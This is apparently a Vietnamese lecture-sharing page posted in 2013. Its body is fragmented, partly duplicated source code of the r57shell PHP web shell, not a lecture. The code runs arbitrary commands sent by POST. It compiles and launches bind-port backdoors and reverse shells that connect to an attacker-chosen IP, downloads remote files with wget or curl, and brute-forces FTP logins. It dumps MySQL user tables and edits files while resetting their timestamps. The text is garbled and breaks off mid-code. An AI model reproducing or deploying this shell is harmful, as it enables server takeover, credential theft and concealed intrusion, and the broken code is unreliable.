Tìm kiếm Bài giảng
123
- 0 / 0
-
(Tài liệu chưa được thẩm định)
Nguồn: 123
Người gửi: Ngọ Duy Cường
Ngày gửi: 07h:59' 22-05-2013
Dung lượng: 102.5 KB
Số lượt tải: 7
Nguồn: 123
Người gửi: Ngọ Duy Cường
Ngày gửi: 07h:59' 22-05-2013
Dung lượng: 102.5 KB
Số lượt tải: 7
Số lượt thích:
0 người
`.ws(1).` `.ws(2).`r57shell `.$version.``; echo ws(2); echo "".date ("d-m-Y H:i:s").""; echo ws(2).$lb." phpinfo ".$rb; echo ws(2).$lb." php.ini ".$rb; echo ws(2).$lb." cpu ".$rb; echo ws(2).$lb." mem ".$rb; if($unix) { echo ws(2).$lb." users ".$rb; } echo ws(2).$lb." tmp ".$rb; echo ws(2).$lb." delete ".$rb."
"; echo ws(2); echo (($safe_mode)?("safe_mode: ON"):("safe_mode: OFF")); echo ws(2); echo "PHP version: ".@phpversion().""; $curl_on = @function_exists(`curl_version`); echo ws(2); echo "cURL: ".(($curl_on)?("ON"):("OFF")); echo ws(2); echo "MySQL: "; $mysql_on = @function_exists(`mysql_connect`); if($mysql_on){ echo "ON"; } else { echo "OFF"; } echo ws(2); echo "MSSQL: "; $mssql_on = @function_exists(`mssql_connect`); if($mssql_on){echo "ON";}else{echo "OFF";} echo ws(2); echo "PostgreSQL: "; $pg_on = @function_exists(`pg_connect`); if($pg_on){echo "ON";}else{echo "OFF";} echo ws(2); echo "Oracle: "; $ora_on = @function_exists(`ocilogon`); if($ora_on){echo "ON";}else{echo "OFF";} echo "
".ws(2); echo "Kapalı Funtionslar : "; if(``==($df=@ini_get(`disable_functions`))){echo "NONE";}else{echo "$df";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); echo "
".ws(2)."HDD Free : ".view_size($free)." HDD Total : ".view_size($all).""; echo `uname -a :`.ws(1).`
sysctl :`.ws(1).`
$OSTYPE :`.ws(1).`
Server :`.ws(1).`
id :`.ws(1).`
pwd :`.ws(1).`"; $uname = ex(`uname -a`); echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
"):(ws(3).@substr(@php_uname(),0,120)."
")); if(!$safe_mode){ $bsd1 = ex(`sysctl -n kern.ostype`); $bsd2 = ex(`sysctl -n kern.osrelease`); $lin1 = ex(`sysctl -n kernel.ostype`); $lin2 = ex(`sysctl -n kernel.osrelease`); } if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } else { $sysctl = "-"; } echo ws(3).$sysctl."
"; echo ws(3).ex(`echo $OSTYPE`)."
"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; $id = ex(`id`); echo((!empty($id))?(ws(3).$id."
"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
")); echo ws(3).$dir; echo ws(3).`( `.perms(@fileperms($dir)).` )`; echo "OS :`.ws(1).`
Server :`.ws(1).`
User :`.ws(1).`
pwd :`.ws(1).`"; echo ws(3).@substr(@php_uname(),0,120)."
"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; echo ws(3).@get_current_user()."
"; echo ws(3).$dir; echo "
"; } echo ""; echo "
".$lang[$language.`_text61`]."
".$lang[$language.`_text63`]."
".$lang[$language.`_text62`]."
".$lang[$language.`_text64`]."".$_POST[`e_name`]."
"; echo ""; echo ""; echo ""; echo (!empty($only_read)?("
".$lang[$language.`_text44`]):("
")); echo ""; exit(); } } if(!empty($_POST[`cmd`]) && $_POST[`cmd`]=="save_file") { $mtime = @filemtime($_POST[`e_name`]); if(!$file=@fopen($_POST[`e_name`],"w")) { echo we($_POST[`e_name`]); } else { if($unix) $_POST[`e_text`]=@str_replace(" "," ",$_POST[`e_text`]); @fwrite($file,$_POST[`e_text`]); @touch($_POST[`e_name`],$mtime,$mtime); $_POST[`cmd`]=""; echo "
".$lang[$language.`_text45`].""; } } if (!empty($_POST[`port`])&&!empty($_POST[`bind_pass`])&&($_POST[`use`]=="C")) { cf("/tmp/bd.c",$port_bind_bd_c); $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); @unlink("/tmp/bd.c"); $blah = ex("/tmp/bd ".$_POST[`port`]." ".$_POST[`bind_pass`]." &"); $_POST[`cmd`]="ps -aux | grep bd"; } if (!empty($_POST[`port`])&&!empty($_POST[`bind_pass`])&&($_POST[`use`]=="Perl")) { cf("/tmp/bdpl",$port_bind_bd_pl); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/bdpl ".$_POST[`port`]." &"); $_POST[`cmd`]="ps -aux | grep bdpl"; } if (!empty($_POST[`ip`]) && !empty($_POST[`port`]) && ($_POST[`use`]=="Perl")) { cf("/tmp/back",$back_connect); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/back ".$_POST[`ip`]." ".$_POST[`port`]." &"); $_POST[`cmd`]="echo "Now script try connect to ".$_POST[`ip`]." port ".$_POST[`port`]." ...""; } if (!empty($_POST[`ip`]) && !empty($_POST[`port`]) && ($_POST[`use`]=="C")) { cf("/tmp/back.c",$back_connect_c); $blah = ex("gcc -o /tmp/backc /tmp/back.c"); @unlink("/tmp/back.c"); $blah = ex("/tmp/backc ".$_POST[`ip`]." ".$_POST[`port`]." &"); $_POST[`cmd`]="echo "Now script try connect to ".$_POST[`ip`]." port ".$_POST[`port`]." ...""; } if (!empty($_POST[`local_port`]) && !empty($_POST[`remote_host`]) && !empty($_POST[`remote_port`]) && ($_POST[`use`]=="Perl")) { cf("/tmp/dp",$datapipe_pl); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/dp ".$_POST[`local_port`]." ".$_POST[`remote_host`]." ".$_POST[`remote_port`]." &"); $_POST[`cmd`]="ps -aux | grep dp"; } if (!empty($_POST[`local_port`]) && !empty($_POST[`remote_host`]) && !empty($_POST[`remote_port`]) && ($_POST[`use`]=="C")) { cf("/tmp/dpc.c",$datapipe_c); $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); @unlink("/tmp/dpc.c"); $blah = ex("/tmp/dpc ".$_POST[`local_port`]." ".$_POST[`remote_port`]." ".$_POST[`remote_host`]." &"); $_POST[`cmd`]="ps -aux | grep dpc"; } if (!empty($_POST[`alias`])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST[`alias`] == $alias_name){$_POST[`cmd`]=$alias_cmd;}}} if (!empty($HTTP_POST_FILES[`userfile`][`name`])) { if(isset($_POST[`nf1`]) && !empty($_POST[`new_name`])) { $nfn = $_POST[`new_name`]; } else { $nfn = $HTTP_POST_FILES[`userfile`][`name`]; } @copy($HTTP_POST_FILES[`userfile`][`tmp_name`], $_POST[`dir`]."/".$nfn) or print("
Malesef gulum Buraya Yükleyemezsin ".$HTTP_POST_FILES[`userfile`][`name`]."
"); } if (!empty($_POST[`with`]) && !empty($_POST[`rem_file`]) && !empty($_POST[`loc_file`])) { switch($_POST[`with`]) { case wget: $_POST[`cmd`] = which(`wget`)." ".$_POST[`rem_file`]." -O ".$_POST[`loc_file`].""; break; case fetch: $_POST[`cmd`] = which(`fetch`)." -o ".$_POST[`loc_file`]." -p ".$_POST[`rem_file`].""; break; case lynx: $_POST[`cmd`] = which(`lynx`)." -source ".$_POST[`rem_file`]." > ".$_POST[`loc_file`].""; break; case links: $_POST[`cmd`] = which(`links`)." -source ".$_POST[`rem_file`]." > ".$_POST[`loc_file`].""; break; case GET: $_POST[`cmd`] = which(`GET`)." ".$_POST[`rem_file`]." > ".$_POST[`loc_file`].""; break; case curl: $_POST[`cmd`] = which(`curl`)." ".$_POST[`rem_file`]." -o ".$_POST[`loc_file`].""; break; } } if(!empty($_POST[`cmd`]) && ($_POST[`cmd`]=="ftp_file_up" || $_POST[`cmd`]=="ftp_file_down")) { list($ftp_server,$ftp_port) = split(":",$_POST[`ftp_server_port`]); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); } else { if(!@ftp_login($connection,$_POST[`ftp_login`],$_POST[`ftp_password`])) { fe($language,1); } else { if($_POST[`cmd`]=="ftp_file_down") { if(chop($_POST[`loc_file`])==$dir) { $_POST[`loc_file`]=$dir.(($windows)?(`\`):(`/`)).basename($_POST[`ftp_file`]); } @ftp_get($connection,$_POST[`loc_file`],$_POST[`ftp_file`],$_POST[`mode`]); } if($_POST[`cmd`]=="ftp_file_up") { @ftp_put($connection,$_POST[`ftp_file`],$_POST[`loc_file`],$_POST[`mode`]); } } } @ftp_close($connection); $_POST[`cmd`] = ""; } if(!empty($_POST[`cmd`]) && $_POST[`cmd`]=="ftp_brute") { list($ftp_server,$ftp_port) = split(":",$_POST[`ftp_server_port`]); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); $_POST[`cmd`] = ""; } else if(!$users=get_users()) { echo "
".$lang[$language.`_text96`].""; $_POST[`cmd`] = ""; } @ftp_close($connection); } echo $table_up3; if (empty($_POST[`cmd`])&&!$safe_mode) { $_POST[`cmd`]=($windows)?("dir"):("ls -lia"); } else if(empty($_POST[`cmd`])&&$safe_mode){ $_POST[`cmd`]="safe_dir"; } echo $font.$lang[$language.`_text1`].": ".$_POST[`cmd`]."
< count($dir_list); $i++) echo $dir_list[$i]." "; @imap_close($stream); break; case `test7`: $stream = @imap_open($_POST[`test7_file`], "", ""); $str = @imap_body($stream, 1); echo $str; @imap_close($stream); break; } } else if(($_POST[`cmd`]!="php_eval")&&($_POST[`cmd`]!="mysql_dump")&&($_POST[`cmd`]!="db_query")&&($_POST[`cmd`]!="ftp_brute")){ $cmd_rep = ex($_POST[`cmd`]); if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,`d`,`w`))." "; } else { echo @htmlspecialchars($cmd_rep)." "; }} if ($_POST[`cmd`]=="ftp_brute") { $suc = 0; foreach($users as $user) { $connection = @ftp_connect($ftp_server,$ftp_port,10); if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success "; $suc++; } else if(isset($_POST[`reverse`])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success "; $suc++; } } @ftp_close($connection); } echo " ------------------------------------- "; $count = count($users); if(isset($_POST[`reverse`])) { $count *= 2; } echo $lang[$language.`_text97`].$count." "; echo $lang[$language.`_text98`].$suc." "; } if ($_POST[`cmd`]=="php_eval"){ $eval = @str_replace("db = $_POST[`db`]; $sql->host = $_POST[`db_server`]; $sql->port = $_POST[`db_port`]; $sql->user = $_POST[`mysql_l`]; $sql->pass = $_POST[`mysql_p`]; $sql->base = $_POST[`mysql_db`]; if(!$sql->connect()) { echo "[-] ERROR! Can`t connect to SQL server"; } else if(!$sql->select_db()) { echo "[-] ERROR! Can`t select database"; } else if(!$sql->dump($_POST[`mysql_tbl`])) { echo "[-] ERROR! Can`t create dump"; } else { if(empty($_POST[`dif`])) { foreach($sql->dump as $v) echo $v." "; } else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v." "); } else { echo "[-] ERROR! Can`t write in dump file"; } } } echo "
"; echo ""; echo ""; echo "
".$lang[$language.`_text4`].$arrow."".$lang[$language.`_text43`].$arrow."".$lang[$language.`_text58`].$arrow."".$lang[$language.`_text68`].$arrow."".$lang[$language.`_text69`].$arrow."".$lang[$language.`_text70`].$arrow."".ws(9).$lang[$language.`_text8`].$arrow.ws(4)."".$lang[$language.`_text52`].$arrow."".$lang[$language.`_text53`].$arrow."".$lang[$language.`_text55`].$arrow."".$lang[$language.`_text72`].$arrow."".$lang[$language.`_text73`].$arrow."".$lang[$language.`_text74`].$arrow."
".div(`id9`).""; echo in(`hidden`,`dir`,0,$dir).in(`hidden`,`cmd`,0,`php_eval`); echo "
".ws(1).in(`submit`,`submit`,0,$lang[$language.`_butt1`]); echo "".$lang[$language.`_text30`].$arrow."".$lang[$language.`_text30`].$arrow."".$lang[$language.`_text36`].$arrow."".$lang[$language.`_text37`].$arrow."".$lang[$language.`_text38`].$arrow."".$lang[$language.`_text14`].$arrow."".$lang[$language.`_text30`].$arrow."".$lang[$language.`_text36`].$arrow."".$lang[$language.`_text37`].$arrow."".$lang[$language.`_text38`].$arrow."".$lang[$language.`_text14`].$arrow."".$lang[$language.`_text3`].$arrow."".$lang[$language.`_text30`].$arrow."".$lang[$language.`_text4`].$arrow."".$lang[$language.`_text30`].$arrow."".$lang[$language.`_text6`].$arrow."".$lang[$language.`_text21`].$arrow."".$lang[$language.`_text16`].$arrow."".$lang[$language.`_text17`].$arrow."".$lang[$language.`_text18`].$arrow."".$lang[$language.`_text59`].$arrow."".$lang[$language.`_text91`].$arrow."
".$lang[$language.`_text87`]."".$lang[$language.`_text88`].$arrow."".$lang[$language.`_text37`].$arrow."".$lang[$language.`_text38`].$arrow."".$lang[$language.`_text89`].$arrow."".$lang[$language.`_text18`].$arrow."".$lang[$language.`_text90`].$arrow."
".$lang[$language.`_text100`]."".$lang[$language.`_text88`].$arrow."".$lang[$language.`_text37`].$arrow."".$lang[$language.`_text38`].$arrow."".$lang[$language.`_text18`].$arrow."".$lang[$language.`_text89`].$arrow."".$lang[$language.`_text90`].$arrow."".$lang[$language.`_text88`].$arrow."".$lang[$language.`_text99`]." ( ".$lang[$language.`_text95`]." )
".$lang[$language.`_text103`]."".$lang[$language.`_text105`].$arrow."".$lang[$language.`_text106`].$arrow."".$lang[$language.`_text107`].$arrow."".$lang[$language.`_text108`].$arrow."
".$lang[$language.`_text104`]."".$lang[$language.`_text105`].$arrow."".$lang[$language.`_text106`].$arrow."".$lang[$language.`_text107`].$arrow."".$lang[$language.`_text18`].$arrow."".$lang[$language.`_text91`].$arrow.""; } if($mysql_on||$mssql_on||$pg_on||$ora_on) { $select = ``; if($mssql_on) $select .= ``; if($pg_on) $select .= ``; if($ora_on) $select .= ``; $select .= ``; echo $table_up1.$lang[$language.`_text82`].up_down(`id20`).$table_up2.div(`id20`).$ts."".$fs."".$ts; echo "
".$lang[$language.`_text40`]."
"; echo sr(35,"".$lang[$language.`_text80`].$arrow."",$select); echo sr(35,"".$lang[$language.`_text111`].$arrow."",in(`text`,`db_server`,15,(!empty($_POST[`db_server`])?($_POST[`db_server`]):("localhost"))).` : `.in(`text`,`db_port`,15,(!empty($_POST[`db_port`])?($_POST[`db_port`]):("3306")))); echo sr(35,"".$lang[$language.`_text37`].` : `.$lang[$language.`_text38`].$arrow."",in(`text`,`mysql_l`,15,(!empty($_POST[`mysql_l`])?($_POST[`mysql_l`]):("root"))).` : `.in(`text`,`mysql_p`,15,(!empty($_POST[`mysql_p`])?($_POST[`mysql_p`]):("password")))); echo sr(35,"".$lang[$language.`_text36`].$arrow."",in(`text`,`mysql_db`,15,(!empty($_POST[`mysql_db`])?($_POST[`mysql_db`]):("mysql"))).` . `.in(`text`,`mysql_tbl`,15,(!empty($_POST[`mysql_tbl`])?($_POST[`mysql_tbl`]):("user")))); echo sr(35,in(`hidden`,`dir`,0,$dir).in(`hidden`,`cmd`,0,`mysql_dump`)."".$lang[$language.`_text41`].$arrow."",in(`checkbox`,`dif id=dif`,0,`1`).in(`text`,`dif_name`,31,(!empty($_POST[`dif_name`])?($_POST[`dif_name`]):("dump.sql")))); echo sr(35,"",in(`submit`,`submit`,0,$lang[$language.`_butt9`])); echo $te."".$fe.$fs."".$ts; echo "
".$lang[$language.`_text83`]."
"; echo sr(35,"".$lang[$language.`_text80`].$arrow."",$select); echo sr(35,"".$lang[$language.`_text111`].$arrow."",in(`text`,`db_server`,15,(!empty($_POST[`db_server`])?($_POST[`db_server`]):("localhost"))).` : `.in(`text`,`db_port`,15,(!empty($_POST[`db_port`])?($_POST[`db_port`]):("3306")))); echo sr(35,"".$lang[$language.`_text37`].` : `.$lang[$language.`_text38`].$arrow."",in(`text`,`mysql_l`,15,(!empty($_POST[`mysql_l`])?($_POST[`mysql_l`]):("root"))).` : `.in(`text`,`mysql_p`,15,(!empty($_POST[`mysql_p`])?($_POST[`mysql_p`]):("password")))); echo sr(35,"".$lang[$language.`_text39`].$arrow."",in(`text`,`mysql_db`,15,(!empty($_POST[`mysql_db`])?($_POST[`mysql_db`]):("mysql")))); echo sr(35,"".$lang[$language.`_text84`].$arrow."".in(`hidden`,`dir`,0,$dir).in(`hidden`,`cmd`,0,`db_query`),""); echo $te."
".in(`submit`,`submit`,0,$lang[$language.`_butt1`])."
".$fe."
".$lang[$language.`_text9`]."
".$lang[$language.`_text12`]."
".$lang[$language.`_text22`]."
"; echo ws(2); echo (($safe_mode)?("safe_mode: ON"):("safe_mode: OFF")); echo ws(2); echo "PHP version: ".@phpversion().""; $curl_on = @function_exists(`curl_version`); echo ws(2); echo "cURL: ".(($curl_on)?("ON"):("OFF")); echo ws(2); echo "MySQL: "; $mysql_on = @function_exists(`mysql_connect`); if($mysql_on){ echo "ON"; } else { echo "OFF"; } echo ws(2); echo "MSSQL: "; $mssql_on = @function_exists(`mssql_connect`); if($mssql_on){echo "ON";}else{echo "OFF";} echo ws(2); echo "PostgreSQL: "; $pg_on = @function_exists(`pg_connect`); if($pg_on){echo "ON";}else{echo "OFF";} echo ws(2); echo "Oracle: "; $ora_on = @function_exists(`ocilogon`); if($ora_on){echo "ON";}else{echo "OFF";} echo "
".ws(2); echo "Kapalı Funtionslar : "; if(``==($df=@ini_get(`disable_functions`))){echo "NONE";}else{echo "$df";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); echo "
".ws(2)."HDD Free : ".view_size($free)." HDD Total : ".view_size($all).""; echo `uname -a :`.ws(1).`
sysctl :`.ws(1).`
$OSTYPE :`.ws(1).`
Server :`.ws(1).`
id :`.ws(1).`
pwd :`.ws(1).`"; $uname = ex(`uname -a`); echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
"):(ws(3).@substr(@php_uname(),0,120)."
")); if(!$safe_mode){ $bsd1 = ex(`sysctl -n kern.ostype`); $bsd2 = ex(`sysctl -n kern.osrelease`); $lin1 = ex(`sysctl -n kernel.ostype`); $lin2 = ex(`sysctl -n kernel.osrelease`); } if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } else { $sysctl = "-"; } echo ws(3).$sysctl."
"; echo ws(3).ex(`echo $OSTYPE`)."
"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; $id = ex(`id`); echo((!empty($id))?(ws(3).$id."
"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
")); echo ws(3).$dir; echo ws(3).`( `.perms(@fileperms($dir)).` )`; echo "OS :`.ws(1).`
Server :`.ws(1).`
User :`.ws(1).`
pwd :`.ws(1).`"; echo ws(3).@substr(@php_uname(),0,120)."
"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; echo ws(3).@get_current_user()."
"; echo ws(3).$dir; echo "
"; } echo ""; echo "
".$lang[$language.`_text61`]."
".$lang[$language.`_text63`]."
".$lang[$language.`_text62`]."
".$lang[$language.`_text64`]."".$_POST[`e_name`]."
"; echo ""; echo ""; echo ""; echo (!empty($only_read)?("
".$lang[$language.`_text44`]):("
")); echo ""; exit(); } } if(!empty($_POST[`cmd`]) && $_POST[`cmd`]=="save_file") { $mtime = @filemtime($_POST[`e_name`]); if(!$file=@fopen($_POST[`e_name`],"w")) { echo we($_POST[`e_name`]); } else { if($unix) $_POST[`e_text`]=@str_replace(" "," ",$_POST[`e_text`]); @fwrite($file,$_POST[`e_text`]); @touch($_POST[`e_name`],$mtime,$mtime); $_POST[`cmd`]=""; echo "
".$lang[$language.`_text45`].""; } } if (!empty($_POST[`port`])&&!empty($_POST[`bind_pass`])&&($_POST[`use`]=="C")) { cf("/tmp/bd.c",$port_bind_bd_c); $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); @unlink("/tmp/bd.c"); $blah = ex("/tmp/bd ".$_POST[`port`]." ".$_POST[`bind_pass`]." &"); $_POST[`cmd`]="ps -aux | grep bd"; } if (!empty($_POST[`port`])&&!empty($_POST[`bind_pass`])&&($_POST[`use`]=="Perl")) { cf("/tmp/bdpl",$port_bind_bd_pl); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/bdpl ".$_POST[`port`]." &"); $_POST[`cmd`]="ps -aux | grep bdpl"; } if (!empty($_POST[`ip`]) && !empty($_POST[`port`]) && ($_POST[`use`]=="Perl")) { cf("/tmp/back",$back_connect); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/back ".$_POST[`ip`]." ".$_POST[`port`]." &"); $_POST[`cmd`]="echo "Now script try connect to ".$_POST[`ip`]." port ".$_POST[`port`]." ...""; } if (!empty($_POST[`ip`]) && !empty($_POST[`port`]) && ($_POST[`use`]=="C")) { cf("/tmp/back.c",$back_connect_c); $blah = ex("gcc -o /tmp/backc /tmp/back.c"); @unlink("/tmp/back.c"); $blah = ex("/tmp/backc ".$_POST[`ip`]." ".$_POST[`port`]." &"); $_POST[`cmd`]="echo "Now script try connect to ".$_POST[`ip`]." port ".$_POST[`port`]." ...""; } if (!empty($_POST[`local_port`]) && !empty($_POST[`remote_host`]) && !empty($_POST[`remote_port`]) && ($_POST[`use`]=="Perl")) { cf("/tmp/dp",$datapipe_pl); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/dp ".$_POST[`local_port`]." ".$_POST[`remote_host`]." ".$_POST[`remote_port`]." &"); $_POST[`cmd`]="ps -aux | grep dp"; } if (!empty($_POST[`local_port`]) && !empty($_POST[`remote_host`]) && !empty($_POST[`remote_port`]) && ($_POST[`use`]=="C")) { cf("/tmp/dpc.c",$datapipe_c); $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); @unlink("/tmp/dpc.c"); $blah = ex("/tmp/dpc ".$_POST[`local_port`]." ".$_POST[`remote_port`]." ".$_POST[`remote_host`]." &"); $_POST[`cmd`]="ps -aux | grep dpc"; } if (!empty($_POST[`alias`])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST[`alias`] == $alias_name){$_POST[`cmd`]=$alias_cmd;}}} if (!empty($HTTP_POST_FILES[`userfile`][`name`])) { if(isset($_POST[`nf1`]) && !empty($_POST[`new_name`])) { $nfn = $_POST[`new_name`]; } else { $nfn = $HTTP_POST_FILES[`userfile`][`name`]; } @copy($HTTP_POST_FILES[`userfile`][`tmp_name`], $_POST[`dir`]."/".$nfn) or print("
Malesef gulum Buraya Yükleyemezsin ".$HTTP_POST_FILES[`userfile`][`name`]."
"); } if (!empty($_POST[`with`]) && !empty($_POST[`rem_file`]) && !empty($_POST[`loc_file`])) { switch($_POST[`with`]) { case wget: $_POST[`cmd`] = which(`wget`)." ".$_POST[`rem_file`]." -O ".$_POST[`loc_file`].""; break; case fetch: $_POST[`cmd`] = which(`fetch`)." -o ".$_POST[`loc_file`]." -p ".$_POST[`rem_file`].""; break; case lynx: $_POST[`cmd`] = which(`lynx`)." -source ".$_POST[`rem_file`]." > ".$_POST[`loc_file`].""; break; case links: $_POST[`cmd`] = which(`links`)." -source ".$_POST[`rem_file`]." > ".$_POST[`loc_file`].""; break; case GET: $_POST[`cmd`] = which(`GET`)." ".$_POST[`rem_file`]." > ".$_POST[`loc_file`].""; break; case curl: $_POST[`cmd`] = which(`curl`)." ".$_POST[`rem_file`]." -o ".$_POST[`loc_file`].""; break; } } if(!empty($_POST[`cmd`]) && ($_POST[`cmd`]=="ftp_file_up" || $_POST[`cmd`]=="ftp_file_down")) { list($ftp_server,$ftp_port) = split(":",$_POST[`ftp_server_port`]); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); } else { if(!@ftp_login($connection,$_POST[`ftp_login`],$_POST[`ftp_password`])) { fe($language,1); } else { if($_POST[`cmd`]=="ftp_file_down") { if(chop($_POST[`loc_file`])==$dir) { $_POST[`loc_file`]=$dir.(($windows)?(`\`):(`/`)).basename($_POST[`ftp_file`]); } @ftp_get($connection,$_POST[`loc_file`],$_POST[`ftp_file`],$_POST[`mode`]); } if($_POST[`cmd`]=="ftp_file_up") { @ftp_put($connection,$_POST[`ftp_file`],$_POST[`loc_file`],$_POST[`mode`]); } } } @ftp_close($connection); $_POST[`cmd`] = ""; } if(!empty($_POST[`cmd`]) && $_POST[`cmd`]=="ftp_brute") { list($ftp_server,$ftp_port) = split(":",$_POST[`ftp_server_port`]); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); $_POST[`cmd`] = ""; } else if(!$users=get_users()) { echo "
".$lang[$language.`_text96`].""; $_POST[`cmd`] = ""; } @ftp_close($connection); } echo $table_up3; if (empty($_POST[`cmd`])&&!$safe_mode) { $_POST[`cmd`]=($windows)?("dir"):("ls -lia"); } else if(empty($_POST[`cmd`])&&$safe_mode){ $_POST[`cmd`]="safe_dir"; } echo $font.$lang[$language.`_text1`].": ".$_POST[`cmd`]."
< count($dir_list); $i++) echo $dir_list[$i]." "; @imap_close($stream); break; case `test7`: $stream = @imap_open($_POST[`test7_file`], "", ""); $str = @imap_body($stream, 1); echo $str; @imap_close($stream); break; } } else if(($_POST[`cmd`]!="php_eval")&&($_POST[`cmd`]!="mysql_dump")&&($_POST[`cmd`]!="db_query")&&($_POST[`cmd`]!="ftp_brute")){ $cmd_rep = ex($_POST[`cmd`]); if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,`d`,`w`))." "; } else { echo @htmlspecialchars($cmd_rep)." "; }} if ($_POST[`cmd`]=="ftp_brute") { $suc = 0; foreach($users as $user) { $connection = @ftp_connect($ftp_server,$ftp_port,10); if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success "; $suc++; } else if(isset($_POST[`reverse`])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success "; $suc++; } } @ftp_close($connection); } echo " ------------------------------------- "; $count = count($users); if(isset($_POST[`reverse`])) { $count *= 2; } echo $lang[$language.`_text97`].$count." "; echo $lang[$language.`_text98`].$suc." "; } if ($_POST[`cmd`]=="php_eval"){ $eval = @str_replace("db = $_POST[`db`]; $sql->host = $_POST[`db_server`]; $sql->port = $_POST[`db_port`]; $sql->user = $_POST[`mysql_l`]; $sql->pass = $_POST[`mysql_p`]; $sql->base = $_POST[`mysql_db`]; if(!$sql->connect()) { echo "[-] ERROR! Can`t connect to SQL server"; } else if(!$sql->select_db()) { echo "[-] ERROR! Can`t select database"; } else if(!$sql->dump($_POST[`mysql_tbl`])) { echo "[-] ERROR! Can`t create dump"; } else { if(empty($_POST[`dif`])) { foreach($sql->dump as $v) echo $v." "; } else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v." "); } else { echo "[-] ERROR! Can`t write in dump file"; } } } echo "
"; echo ""; echo ""; echo "
".$lang[$language.`_text4`].$arrow."".$lang[$language.`_text43`].$arrow."".$lang[$language.`_text58`].$arrow."".$lang[$language.`_text68`].$arrow."".$lang[$language.`_text69`].$arrow."".$lang[$language.`_text70`].$arrow."".ws(9).$lang[$language.`_text8`].$arrow.ws(4)."".$lang[$language.`_text52`].$arrow."".$lang[$language.`_text53`].$arrow."".$lang[$language.`_text55`].$arrow."".$lang[$language.`_text72`].$arrow."".$lang[$language.`_text73`].$arrow."".$lang[$language.`_text74`].$arrow."
".div(`id9`).""; echo in(`hidden`,`dir`,0,$dir).in(`hidden`,`cmd`,0,`php_eval`); echo "
".ws(1).in(`submit`,`submit`,0,$lang[$language.`_butt1`]); echo "".$lang[$language.`_text30`].$arrow."".$lang[$language.`_text30`].$arrow."".$lang[$language.`_text36`].$arrow."".$lang[$language.`_text37`].$arrow."".$lang[$language.`_text38`].$arrow."".$lang[$language.`_text14`].$arrow."".$lang[$language.`_text30`].$arrow."".$lang[$language.`_text36`].$arrow."".$lang[$language.`_text37`].$arrow."".$lang[$language.`_text38`].$arrow."".$lang[$language.`_text14`].$arrow."".$lang[$language.`_text3`].$arrow."".$lang[$language.`_text30`].$arrow."".$lang[$language.`_text4`].$arrow."".$lang[$language.`_text30`].$arrow."".$lang[$language.`_text6`].$arrow."".$lang[$language.`_text21`].$arrow."".$lang[$language.`_text16`].$arrow."".$lang[$language.`_text17`].$arrow."".$lang[$language.`_text18`].$arrow."".$lang[$language.`_text59`].$arrow."".$lang[$language.`_text91`].$arrow."
".$lang[$language.`_text87`]."".$lang[$language.`_text88`].$arrow."".$lang[$language.`_text37`].$arrow."".$lang[$language.`_text38`].$arrow."".$lang[$language.`_text89`].$arrow."".$lang[$language.`_text18`].$arrow."".$lang[$language.`_text90`].$arrow."
".$lang[$language.`_text100`]."".$lang[$language.`_text88`].$arrow."".$lang[$language.`_text37`].$arrow."".$lang[$language.`_text38`].$arrow."".$lang[$language.`_text18`].$arrow."".$lang[$language.`_text89`].$arrow."".$lang[$language.`_text90`].$arrow."".$lang[$language.`_text88`].$arrow."".$lang[$language.`_text99`]." ( ".$lang[$language.`_text95`]." )
".$lang[$language.`_text103`]."".$lang[$language.`_text105`].$arrow."".$lang[$language.`_text106`].$arrow."".$lang[$language.`_text107`].$arrow."".$lang[$language.`_text108`].$arrow."
